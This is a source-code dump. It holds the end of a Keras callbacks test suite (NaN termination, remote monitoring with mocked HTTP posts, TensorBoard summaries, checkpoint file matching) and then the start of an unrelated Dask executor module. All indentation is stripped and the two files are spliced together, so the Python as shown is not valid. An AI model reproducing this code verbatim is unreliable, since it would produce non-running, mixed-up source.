y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1) # a 1 by 1 array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = dataset_ops.DatasetV2.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_batch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Check for V2 scalar summaries, which have a different PB
# structure.
if event.summary.value[
0].metadata.plugin_data.plugin_name == 'scalars':
container = result.scalars
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.logdir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def test_custom_summary(self):
if not context.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = summary_pb2.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with summary_ops_v2.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return summary_ops_v2.write(
tag=tag,
tensor=math_ops.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', math_ops.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def _get_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
return os.path.join(dirpath, filename)
return None
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensoriBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
self.assertIsNone(self._get_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
checkpoint_management.update_checkpoint_state_internal(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
if __name__ == '__main__':
test.main()
|
executor.py | from __future__ import print_function, division, absolute_import
from collections import defaultdict
from concurrent.futures._base import DoneAndNotDoneFutures, CancelledError
from concurrent import futures
from functools import wraps, partial
import itertools
import logging
import os
from time import sleep
import uuid
import dask
from dask.base import tokenize, normalize_token, Base
from dask.core import flatten
from dask.compatibility import apply
from toolz import first, groupby, merge
from tornado import gen
from tornado.gen import Return
from tornado.locks import Event
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado.iostream import StreamClosedError, IOStream
from tornado.queues import Queue
from .client import (WrappedKey, unpack_remotedata, pack_data)
from .core import read, write, connect, rpc, coerce_to_rpc
from .scheduler import Scheduler
from .utils import All, sync, funcname, ignoring
logger = logging.getLogger(__name__)
_global_executor = [None]
class Future(WrappedKey):
""" A remotely running computation
A Future is a local proxy to a result running on a remote worker. A user
manages future objects in the local Python process to determine what
happens in the larger cluster.
Examples
--------
Futures typically emerge from Executor computations
>>> my_future = executor.submit(add, 1, 2) # doctest: +SKIP
We can track the progress and results of a future
>>> my_future # doctest: +SKIP
<Future: status: finished, key: add-8f6e709446674bad78ea8aeecfee188e>
We can get the result or the exception and traceback from the future
>>> my_future.result() # doctest: +SKIP
3
See Also
--------
Executor: Creates futures
"""
def __init__(self, key, executor):
self.key = key
self.executor = executor
self.executor._inc_ref(key)
if key not in executor.futures:
executor.futures[key] = {'event': Event(), 'status': 'pending'}
@property
def status(self):
try:
return self.executor.futures[self.key]['status']
except KeyError:
return 'cancelled'
@property
def event(self):
return self.executor.futures[self.key]['event']
def done(self):
""" Is the computation complete? """
